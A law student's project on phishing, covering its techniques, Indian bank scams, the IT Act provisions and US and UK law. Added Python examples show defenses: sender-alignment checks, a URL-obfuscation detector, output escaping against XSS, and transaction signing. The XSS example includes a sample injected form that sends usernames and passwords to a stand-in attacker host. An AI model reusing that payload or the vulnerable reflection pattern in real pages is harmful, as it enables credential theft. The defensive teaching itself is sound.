
Prevention And Regulation of Phishing in Cyber World: National & International Framework.

Project submitted to
Mr. (Faculty: Cyber Law)

Spandan Pujari
Section: B
Roll No. 144
Semester VII

HIDAYATULLAH NATIONAL LAW UNIVERSITY RAIPUR, CHHATTISGARH

TABLE OF CONTENTS

ACKNOWLEDGMENT
RESEARCH METHODOLOGY
OBJECTIVE
INTRODUCTION
REASONS FOR GROWTH
PHISHING TECHNIQUES
PHISHING ATTACKS IN INDIA
REGULATION UNDER INDIAN & INTERNATIONAL LAWS
PREVENTION OF PHISHING
CONCLUSION
BIBLIOGRAPHY

ACKNOWLEDGMENTS

I would like to express my heartfelt gratitude to my teacher, Mr. , for his unstinted support. I would like to thank the faculty for giving me the chance to research such an intriguing and progressive issue as this.

Thank you, jurists and masters of law, for the expression of your ideas, thoughts and immense amount of knowledge in the form of the various books, articles and opinions. Without all of this, it would have been a Herculean task for me to complete this project.

My gratitude also goes out to the staff and administration of HNLU for the infrastructure in the form of our library and IT Lab that was a source of great help for the completion of this project.

Spandan Pujari
Semester VII

RESEARCH METHODOLOGY

The research methodology used in the project is doctrinal in nature; the references used are secondary sources. Secondary and electronic resources have been largely used to gather information and data about the topic. Books and other references, as guided by the Faculty of Cyber Law, have been primarily helpful in giving this project a firm structure. Websites, dictionaries and articles have also been referred to. Footnotes have been provided wherever needed, either to acknowledge the source or to point to a particular provision of law. Uniform citation has been followed.

OBJECTIVES

• To understand the concept of phishing.
• To understand the reasons for the growth of phishing.
• To obtain a thorough classification of phishing.
• To know the dangers of phishing.
• To comprehend the legislation and regulation concerning phishing.
• To advise on security measures against phishing.

INTRODUCTION

The first documented use of the word "phishing" took place in 1996. Most people believe it originated as an alternative spelling of "fishing," as in "to fish for information".

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.1 Communications purporting to be from popular social web sites, auction sites, banks, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware.2 Phishing is typically carried out by email spoofing3 or instant messaging,4 and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of the social engineering techniques used to deceive users, and it exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures. Many websites have now created secondary tools for applications, like maps for games, but they should be clearly marked as to who wrote them, and you should not use the same passwords anywhere on the internet.

Phishing is a continual threat that keeps growing to this day. The risk grows even larger on social media such as Facebook, Twitter, Myspace etc. Hackers commonly use these sites to attack the people who use them at their workplace, at home, or in public, in order to take personal and security information that can affect the user and the company (if in a workplace environment). Phishing works by exploiting the trust of the user: the victim usually cannot tell that the site or program being visited or used is not real, and that is the moment at which the hacker gains access to personal information such as passwords, usernames, security codes, and credit card numbers, among other things.

A phishing technique was described in detail in a paper and presentation delivered to the International HP Users Group, Interex.5 The first recorded mention of the term "phishing" is found in the hacking tool AOHell (according to its creator), which included a function for stealing the passwords or financial details of America Online users.6 The top ten countries hosting phishing sites are the US, UK, Germany, Brazil, Canada, France, Russia, Poland, the Netherlands and Japan. According to Ghosh, there were "445,004 attacks in 2012 as compared to 258,461 in 2011 and 187,203 in 2010", which shows that phishing has been a continuing threat to individuals.

A recent and well-known case of phishing is the suspected Chinese phishing campaign targeting the Gmail accounts of highly ranked officials of the United States and South Korean governments and militaries, and of Chinese political activists. The Chinese government continues to deny accusations of taking part in cyber-attacks from within its borders, but evidence has been revealed that China's own People's Liberation Army has assisted in the coding of cyber-attack software.

1 Van der Merwe, A J, Loock, M, Dabrowski, M. (2005), Characteristics and Responsibilities involved in a Phishing Attack, Winter International Symposium on Information and Communication Technologies, Cape Town, January 2005.
2 Safe Browsing (Google Online Security Blog)
3 Landing another blow against email phishing (Google Online Security Blog)
4 Tan, Koontorm Center. "Phishing and Spamming via IM (SPIM)"
5 Felix, Jerry and Hauck, Chris (September 1987). "System Security: A Hacker's Perspective". 1987 Interex Proceedings
6 Langberg, Mike (September 8, 1995). "AOL Acts to Thwart Hackers". San Jose Mercury News

REASONS FOR GROWTH

There are three major factors behind the recent spurt in phishing attacks worldwide, and particularly in India:

1. Unawareness among the public: Worldwide, and particularly in India, there has been a lack of awareness regarding phishing attacks among the common masses. Users are unaware that their personal information is actively being targeted by criminals, and they do not take proper precautions when they conduct online activities.

2. Unawareness of policy: Fraudsters often count on the victim's unawareness of the policies and procedures that banks and financial institutions follow for contacting customers, particularly for issues relating to account maintenance and fraud investigation. Customers unaware of the policies governing an online transaction are likely to be more susceptible to the social-engineering aspect of a phishing scam, regardless of its technical sophistication.

3. Technical sophistication: Fraudsters are now using advanced technology that has already been used successfully for activities such as spam, distributed denial of service (DDoS), and electronic surveillance. Even as customers are becoming aware of phishing, criminals are developing techniques to counter this awareness. These techniques include URL obfuscation to make phishing emails and web sites appear more legitimate, and the exploitation of vulnerabilities in web browsers that allow the download and execution of malicious code from a hostile web site.

PHISHING TECHNIQUES

Phishing

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

Spear phishing

Phishing attempts directed at specific individuals or companies have been termed spear phishing.7 Attackers may gather personal information about their target to increase their probability of success. This technique is, by far, the most successful on the internet today, accounting for 91% of attacks.8

Clone phishing

A type of phishing attack whereby a legitimate, and previously delivered, email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical, or cloned, email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version of the original. This technique could be used to pivot (indirectly) from a previously infected machine and gain a foothold on another machine, by exploiting the social trust associated with the inferred connection due to both parties having received the original email.
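Clone phishing, as described above, depends on a sender address spoofed to look like the original sender; the same weakness is what the "Eliminating phishing mail" response later in this project targets. A receiving mail gateway can catch much of this by checking whether the domain in the visible From: header is the same domain that actually passed SPF or DKIM, which is the alignment check DMARC performs. The following is an added example and not part of the original project: the two messages are constructed, the domains are placeholders, and the organizational-domain function is a deliberate simplification of what DMARC does with the public suffix list.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: a genuine alert from the bank. The domain that passed SPF
# and DKIM at the receiving server matches the visible From: domain.
LEGIT_MESSAGE = """\
Authentication-Results: mx.example.net; spf=pass (sender IP is 203.0.113.9) smtp.mailfrom=bounce@mail.examplebank.com; dkim=pass header.d=examplebank.com
From: "Example Bank Alerts" <alerts@examplebank.com>
To: customer@example.net
Subject: Your statement is ready

Your monthly statement is available in internet banking.
"""

# Constructed sample: a cloned copy of that mail sent from unrelated bulk
# infrastructure. From: still claims examplebank.com, but nothing for that
# domain passed SPF or DKIM.
CLONED_MESSAGE = """\
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=noreply@bulk-sender.example; dkim=none
From: "Example Bank Alerts" <alerts@examplebank.com>
To: customer@example.net
Subject: Your statement is ready (updated link)

Your monthly statement is available, please use the updated link.
"""


def org_domain(domain: str) -> str:
    """Simplified organizational domain: the last two labels. Real DMARC uses the
    public suffix list; this shortcut is an assumption for the example only."""
    return ".".join(domain.lower().split(".")[-2:])


def authenticated_domains(auth_results: str) -> dict[str, str]:
    """Domains that passed SPF (smtp.mailfrom) or DKIM (header.d) according to the
    receiving server's own Authentication-Results header."""
    found: dict[str, str] = {}
    spf = re.search(r"spf=pass[^;]*smtp\.mailfrom=(?:[^@\s;]+@)?([\w.-]+)", auth_results)
    if spf:
        found["spf"] = spf.group(1).lower()
    dkim = re.search(r"dkim=pass[^;]*header\.d=([\w.-]+)", auth_results)
    if dkim:
        found["dkim"] = dkim.group(1).lower()
    return found


def from_is_aligned(raw_message: str) -> tuple[bool, str]:
    """Relaxed DMARC-style alignment: the visible From: domain must share its
    organizational domain with a domain that passed SPF or DKIM."""
    msg = message_from_string(raw_message)
    _, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2].lower()
    if not from_domain:
        return False, "no usable From: address"
    passed = authenticated_domains(msg.get("Authentication-Results", ""))
    for mech, dom in passed.items():
        if org_domain(dom) == org_domain(from_domain):
            return True, f"{mech} pass for {dom} aligns with From: {from_domain}"
    return False, f"From: {from_domain} is not aligned with any passing result {passed}"


if __name__ == "__main__":
    print("genuine:", from_is_aligned(LEGIT_MESSAGE))
    print("cloned: ", from_is_aligned(CLONED_MESSAGE))
```

The check only trusts an Authentication-Results header written by the receiving server itself; an upstream hop must strip any such header arriving from outside, otherwise a sender could simply forge a passing result. What the gateway does with a non-aligned message (quarantine, reject, or tag) is the policy decision that DMARC lets the owning domain publish.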

Whaling

Several recent phishing attacks have been directed specifically at senior executives and other high-profile targets within businesses, and the term whaling has been coined for these kinds of attacks.

7 "What is spear phishing?". Microsoft Security At Home.
8 Stephenson, Debbie. "Spear Phishing: Who's Getting Caught?". Firmex.

Rogue WiFi (MitM)

Attackers set up or compromise free WiFi access points and configure them to run man-in-the-middle (MitM) attacks, often with tools like sslstrip, to compromise all users of the access point.

Man-in-the-middle attacks

In this class of attack, the attacker sits between the customer and the real web-based application and proxies all communications between the systems. This form of attack is successful for both HTTP and HTTPS communications. The customer connects to the attacker's server as if it were the real site, while the attacker's server makes a simultaneous connection to the real site. The attacker's server then proxies all communications between the customer and the real web-based application server, typically in real time.

URL Obfuscation Attacks

Using a URL obfuscation technique, which involves minor changes to the URL, the fraudster tricks the user into following a hyperlink (URL) to the attacker's server without the user realizing that he has been duped. URL obfuscation relies on little-known details of how URLs and the underlying TCP/IP protocols are interpreted to trick users into viewing a website that they did not intend to visit.
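The "minor changes to the URL" mentioned above are mechanical enough that a mail filter or a security-awareness tool can flag them before the user ever clicks. The following added example (not from the original project) is such a link checker: it reports user-info text placed before an "@" that browsers ignore, bare IP addresses in place of a domain name, punycode hosts that may be homographs, and look-alike spellings of a protected brand. The brand and domain names are constructed placeholders, and the look-alike substitution table is a small illustrative assumption rather than a complete one.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed: the legitimate domain(s) the filter protects and the brand string to watch for.
LEGIT_DOMAINS = {"examplebank.com"}
PROTECTED_BRANDS = {"examplebank"}

# Characters and digraphs commonly substituted to produce look-alike names (illustrative subset).
_LOOKALIKES = {"0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w"}


def normalize(label: str) -> str:
    """Undo common look-alike substitutions so 'examp1ebank' compares equal to 'examplebank'."""
    for fake, real in _LOOKALIKES.items():
        label = label.replace(fake, real)
    return label.replace("-", "")


def is_legit_host(host: str) -> bool:
    """True when the host is one of the protected domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)


def analyze_url(url: str) -> list[str]:
    """Return the reasons a link looks obfuscated; an empty list means nothing was flagged."""
    reasons: list[str] = []
    parts = urlsplit(url if "://" in url else "http://" + url)
    netloc = parts.netloc
    host = (parts.hostname or "").lower()      # hostname already drops user-info and port

    # 1. http://examplebank.com@203.0.113.5/ - everything before '@' is user-info,
    #    which browsers discard; the real host is what follows it.
    if "@" in netloc:
        reasons.append(f"text before '@' is user-info; the real host is {host!r}")

    # 2. A raw IP address instead of a domain name.
    try:
        ipaddress.ip_address(host)
        reasons.append("host is a bare IP address rather than a domain name")
    except ValueError:
        pass

    # 3. Internationalized labels are encoded as xn--...; they can render as look-alike glyphs.
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("internationalized (punycode) host may be a homograph")

    # 4. The brand name appears in the host or in the user-info, but the host is not ours.
    if not is_legit_host(host):
        userinfo = netloc.split("@")[0].lower() if "@" in netloc else ""
        for brand in PROTECTED_BRANDS:
            if brand in normalize(host) or brand in normalize(userinfo):
                reasons.append(f"brand {brand!r} appears in a link whose host {host!r} is not the brand's")
    return reasons


if __name__ == "__main__":
    for link in ("https://www.examplebank.com/login",
                 "http://www.examplebank.com@203.0.113.5/login",
                 "http://examp1ebank-secure.example/verify"):
        print(link, "->", analyze_url(link) or "ok")
```

A real deployment would compare against a maintained list of registered domains rather than a hard-coded set, and would treat each flagged reason as a score input rather than a verdict, since some legitimate links (short links, IP-based intranet hosts) trip individual rules.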

XSS (Cross-site Scripting)

Cross-site scripting (XSS) attacks make use of custom URL or code injection into a valid web-based application URL or embedded data field. In general, these XSS techniques are the result of a site's failure to validate user input before returning it to the client's web browser. A phishing scenario using XSS:

• The victim logs into a web site.
• The attacker has spread "mines" using an XSS vulnerability.
• The victim falls upon an XSS mine.
• The victim gets a message saying that their session has terminated and they have to authenticate again.
• The victim's username and password are sent to the attacker.
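The scenario above starts from one defect: a page that reflects user input without validating or encoding it. The following added example (not from the original project; the page fragment, the validation rule and the sample input are constructed) places the vulnerable reflection beside two layers of defense, an input allow-list and HTML output encoding, and uses the standard-library HTML parser to count which elements a browser would actually create from each version of the page.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed input of the kind an XSS "mine" carries: markup that, once reflected,
# draws a fake re-login prompt whose form posts to a host the attacker controls.
INJECTED_INPUT = (
    '<form action="https://attacker.example/collect">Session expired, log in again: '
    '<input name="username"><input name="password"></form>'
)


def render_vulnerable(query: str) -> str:
    """Reflects the query straight into the page: any markup in it becomes live HTML."""
    return f"<p>Results for: {query}</p>"


def query_is_allowed(query: str) -> bool:
    """Input validation by allow-list (constructed rule): a search term may contain only
    letters, digits, spaces and a few punctuation marks, up to 64 characters."""
    return re.fullmatch(r"[\w .,'-]{1,64}", query) is not None


def render_safe(query: str) -> str:
    """Output encoding: escape() turns < > & " ' into entities, so the browser displays
    the text instead of interpreting it, even if validation was skipped upstream."""
    return f"<p>Results for: {escape(query, quote=True)}</p>"


class _TagCollector(HTMLParser):
    """Records every start tag the parser encounters."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def elements_created(rendered: str) -> list[str]:
    """Elements a browser would build from the page, excluding the template's own <p>."""
    parser = _TagCollector()
    parser.feed(rendered)
    return [t for t in parser.tags if t != "p"]


if __name__ == "__main__":
    print("vulnerable page creates:", elements_created(render_vulnerable(INJECTED_INPUT)))
    print("encoded page creates:   ", elements_created(render_safe(INJECTED_INPUT)))
    print("input passes allow-list:", query_is_allowed(INJECTED_INPUT))
```

Validation and encoding are complementary: the allow-list rejects the injected input outright, and encoding guarantees that whatever does reach the template is shown as text. Encoding is the layer that must never be skipped, because the correct allow-list depends on context and is easy to get wrong.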

PHISHING IN INDIA

Phishing is a relatively new concept in India, unheard of a couple of years back, but recently there has been a rise in the number of phishing cases in India in which the innocent public fall prey to the sinister designs of fraudsters. In India, the most common form of phishing is an email pretending to be from a bank, in which the fraudster asks you to confirm your personal information or login details for some made-up reason, such as the bank upgrading its server. Needless to say, the email contains a link to a fake website that looks exactly like the genuine site. The gullible customers, thinking that it is from the bank, enter the information asked for and send it into the hands of identity thieves. There were phishing attempts against ICICI Bank, UTI Bank, HDFC Bank, SBI etc. in which the modus operandi was similar. It was reported that a large number of customers of these banks had received emails which were falsely misrepresented as having originated from their bank. The recipients of the mails were told to update their bank account information on some pretext. These emails included a hyperlink within the email itself, and a click on that link took recipients to a web page which was identical to their bank's web page. Some of the unsuspecting recipients responded to these mails and gave their login information and passwords. Later on, through internet banking and by using the information so collected, a large number of illegal/fraudulent transactions took place. Apart from the general banking phishing scams, some of the recent phishing attacks that took place in India are as follows:

RBI Phishing Scam: In a daring phishing attack of its kind, the fraudsters did not even spare the Reserve Bank of India. The phishing email, disguised as originating from the RBI, promised its recipient prize money of Rs. 10 lakhs within 48 hours, giving a link which leads the user to a website that resembles the official website of the RBI, with a similar logo and web address. The user is then asked to reveal personal information such as his password, I-PIN number and savings account number. The RBI, however, posted a warning regarding the fraudulent phishing e-mail on the bank's official website.

IT Department Phishing Scam: The email, purporting to come from the Income Tax Department, lures the user with the claim that he is eligible for an income tax refund based on his last annual calculation, and seeks his PAN card number or credit card details.

ICC World Cup 2011: One of the biggest sporting events has also come under phishing attack. The fraudsters have specifically targeted the internet users of the host countries, i.e. India, Bangladesh and Sri Lanka, where the matches of the World Cup are going on. India, which has been allotted 29 matches of the World Cup, is obviously the prime target of the phishing attacks.

REGULATIONS UNDER INDIAN AND INTERNATIONAL LAWS

Phishing fraud is an online fraud in which the fraudster disguises himself and uses false and fraudulent websites of banks and other financial institutions, together with URL links, to deceive people into disclosing valuable personal data, which is later used to swindle e-money from the victim's account. Thus, essentially, it is a cyber crime and it attracts many penal provisions of the Information Technology Act, 2000, as amended in 2008 to add some new provisions dealing with phishing activity. The following sections of the Information Technology Act, 2000 are applicable to phishing activity:

Section 66: The account of the victim is compromised by the phisher, which is not possible unless and until the fraudster fraudulently effects some changes by way of deletion or alteration of the information/data held electronically in the account of the victim residing on the bank's server. Thus, this act is squarely covered by and punishable u/s 66 IT Act.

Section 66A: The disguised email containing the fake link of the bank or organization is used to deceive or to mislead the recipient about the origin of such email, and thus it clearly attracts the provisions of Section 66A IT Act, 2000.

Section 66C: In the phishing email, the fraudster disguises himself as the real banker and uses the unique identifying features of the bank or organization, say its logo, trademark etc., and thus clearly attracts the provision of Section 66C IT Act, 2000.

Section 66D: The fraudster, through the phishing email containing the link to the fake website of the bank or organization, personates the bank or financial institution to cheat innocent persons; thus the offence under Section 66D too is attracted.

The Information Technology Act, 2000 makes penal provisions under Chapter XI of the Act and, further, Section 81 of the IT Act, 2000 contains a non obstante clause, i.e. "the provisions of this Act shall have effect notwithstanding anything inconsistent therewith contained in any other law for the time being in force". The said non obstante clause gives an overriding effect to the provisions of the IT Act over other Acts, including the Indian Penal Code. The aforesaid penal provisions of the IT Act, 2000 which are attracted to the phishing scam have, however, been made bailable by virtue of Section 77B IT Act. This was done intentionally: there is always an identity conflict as to the correct or accurate identity of the person behind the alleged phishing scam, and always a smokescreen around the alleged crime as to whether the person who actually operated these online computer resources has or has not committed the offence. In view of this, and of the possible misuse of the penal provisions for cyber offences contained in the IT Act, the offence is made bailable.

US Legislation on Phishing

The Congress of the USA has enacted a statute regarding phishing attacks named THE ANTI-PHISHING ACT OF 2005.

The Act added two crimes to the current federal law:

1. It criminalized the act of sending a phishing email regardless of whether any recipients of the email suffered any actual damages.

2. It criminalized the act of creating a phishing website regardless of whether any visitors to the website suffered any actual damages.

Senator Leahy described the effects of the Act in this way:

The [Act] protects the integrity of the Internet in two ways. First, it criminalizes the bait. It makes it illegal to knowingly send out spoofed email that links to sham websites, with the intention of committing a crime. Second, it criminalizes the sham websites that are the true scene of the crime.

If someone is convicted of phishing under the law passed by Congress, they could risk spending up to five years in prison. People convicted of phishing may also have to pay a $250,000 fine.

Congress's action on phishing has resulted in steps to see that people can be charged with phishing just for attempting the scam. It doesn't matter whether the phishers were successful or made anything from their criminal venture.

Unfortunately, it can be very hard to catch such people, for a number of reasons. First of all, there are hundreds of phishers out there. Second, they often try to keep a low profile for their website to ensure they are not easily found. This means it can take time to find and capture the criminal. Meanwhile, the phishers continue to defraud companies all over the internet by stealing people's information and using it for themselves.

UK Law on Phishing

The UK government is reforming fraud laws to create an offence covering the perpetrators of phishing attacks. The provision is among a raft of measures designed to clarify existing laws within the new Fraud Bill, which was introduced in the House of Lords on Wednesday.

A new offence of fraud, designed to strengthen the existing law and ease the prosecution process, is the main feature of the bill. The offence can be committed in one of three ways: false representation (as seen in phishing attacks); abuse of position (e.g. a person lifting money from the account of an elderly person under their care); and failing to disclose information (e.g. a lawyer who schemes to keep information from his client so he can make money on the side).

Judges will be able to impose sentences of up to 10 years for any of these three offences. This means fraudsters who pose as financial institutions in the commission of phishing attacks, a form of false representation, could become the subject of extradition proceedings.

PREVENTION OF PHISHING

Phishing is a dangerous activity and has caused incredible damage. The damage caused by phishing ranges from denial of access to email to substantial financial loss. It is estimated that between May 2004 and May 2005, approximately 1.2 million computer users in the United States suffered losses caused by phishing, totaling approximately US$929 million. United States businesses lose an estimated US$2 billion per year as their clients become victims. In 2007, phishing attacks escalated: 3.6 million adults lost US$3.2 billion in the 12 months ending in August 2007. Microsoft claims these estimates are grossly exaggerated and puts the annual phishing loss in the US at US$60 million. In the United Kingdom, losses from web banking fraud, mostly from phishing, almost doubled to GB£23.2m in 2005 from GB£12.2m in 2004, while 1 in 20 computer users claimed to have lost out to phishing in 2005.

According to the 3rd Microsoft Computing Safer Index Report, released in February 2014, the annual worldwide impact of phishing could be as high as $5 billion.

The stance adopted by the UK banking body APACS is that "customers must also take sensible precautions ... so that they are not vulnerable to the criminal." Similarly, when the first spate of phishing attacks hit the Irish Republic's banking sector in September 2006, the Bank of Ireland initially refused to cover losses suffered by its customers (and it still insists that its policy is not to do so), although losses to the tune of €113,000 were made good.

Social responses

One strategy for combating phishing is to train people to recognize phishing attempts and to deal with them. Education can be effective, especially where training provides direct feedback.

People can take steps to avoid phishing attempts by slightly modifying their browsing habits. When contacted about an account needing to be "verified" (or any other topic used by phishers), it is a sensible precaution to contact the company from which the email apparently originates to check that the email is legitimate. Alternatively, the address that the individual knows to be the company's genuine website can be typed into the address bar of the browser, rather than trusting any hyperlinks in the suspected phishing message.

Technical responses

• Helping to identify legitimate websites
• Secure connection
• Overcoming fundamental flaws in the security model of secure browsing
• Browsers alerting users to fraudulent websites
• Augmenting password logins
• Eliminating phishing mail
• Monitoring and takedown
• Transaction verification and signing
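Of the technical responses listed above, transaction verification and signing is the one worth seeing in code, because it explains why a password captured by a phishing site, or a session proxied by the man-in-the-middle attacks described earlier, need not be enough to move money. The following is an added example and not part of the original project: the customer's enrolled device signs the exact payee and amount the customer saw on that device, and the bank accepts the transfer only if the signature verifies and the transaction has not been presented before. Keys, account identifiers and amounts are constructed; a shared HMAC key stands in for the per-device asymmetric key a real deployment would keep in a secure element.

```python
import hashlib
import hmac
import json
import secrets


def canonical(txn: dict) -> bytes:
    """Deterministic serialization: device and bank must hash exactly the same bytes."""
    return json.dumps(txn, sort_keys=True, separators=(",", ":")).encode()


def device_sign(device_key: bytes, txn: dict) -> str:
    """Run on the customer's enrolled device after the payee and amount have been shown
    on the device's own screen (a shared-key HMAC stands in for a real signature here)."""
    return hmac.new(device_key, canonical(txn), hashlib.sha256).hexdigest()


class BankVerifier:
    """Bank-side check that a transfer is exactly what the customer's device signed."""

    def __init__(self, device_keys: dict[str, bytes]) -> None:
        self.device_keys = device_keys          # account id -> enrolled device key
        self.seen_nonces: set[str] = set()      # nonces of transfers already accepted

    def accept(self, txn: dict, signature: str) -> tuple[bool, str]:
        key = self.device_keys.get(txn.get("from", ""))
        if key is None:
            return False, "no enrolled device for this account"
        # Recompute over the transaction as received; constant-time compare.
        if not hmac.compare_digest(device_sign(key, txn), signature):
            return False, "signature does not match the transaction details"
        nonce = txn.get("nonce", "")
        if not nonce or nonce in self.seen_nonces:
            return False, "replayed or missing nonce"
        self.seen_nonces.add(nonce)
        return True, "accepted"


def demo() -> tuple[tuple[bool, str], tuple[bool, str], tuple[bool, str]]:
    """Constructed walk-through: genuine transfer, tampered copy, replayed copy."""
    key = secrets.token_bytes(32)            # constructed device key for account acct-001
    bank = BankVerifier({"acct-001": key})
    txn = {"from": "acct-001", "to": "acct-777", "amount": "1500.00",
           "currency": "INR", "nonce": secrets.token_hex(8)}
    sig = device_sign(key, txn)              # the customer approved exactly this on the device

    tampered = dict(txn, to="acct-999")      # an interceptor redirects the payee in transit
    rejected = bank.accept(tampered, sig)    # the signature no longer matches

    accepted = bank.accept(txn, sig)         # the genuine transfer goes through
    replayed = bank.accept(txn, sig)         # the same signed transfer presented again
    return accepted, rejected, replayed


if __name__ == "__main__":
    for label, result in zip(("genuine", "tampered", "replayed"), demo()):
        print(f"{label}: {result}")
```

Because the signature covers the payee and the amount, an interceptor can watch the session but cannot change where the money goes without invalidating it, and the nonce stops an old, validly signed transfer from being submitted twice. The property only holds if the device shows the customer the real payee before signing; a scheme that signs whatever the browser sends has merely moved the phishing problem.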

CONCLUSION

Phishing is a major concern in the contemporary e-commerce environment in India and will continue to be so because of the lack of awareness among Internet users who are new to cyber-space. There is no silver bullet to thwart a phishing attack. However, it has been noticed in most of the phishing scams worldwide, and particularly in India, that the hacker succeeds in the phishing attempt because of uninformed, gullible customers who, without knowing that they are being trapped, unwittingly pass on the information asked for by the fraudster. Therefore, awareness and customer education are the key to fighting the menace of phishing, apart from mitigating or preventative measures. The law enforcement agencies, the legislature and the industry should come together and coordinate in their fight against the menace of phishing.

BIBLIOGRAPHY

Information Technology Act, 2000

Websites Referred

http://www.theregister.co.uk/2005/05/27/fraud_law_reform/

law.duke.edu/journals/dltr/articles/2005dltr0006.html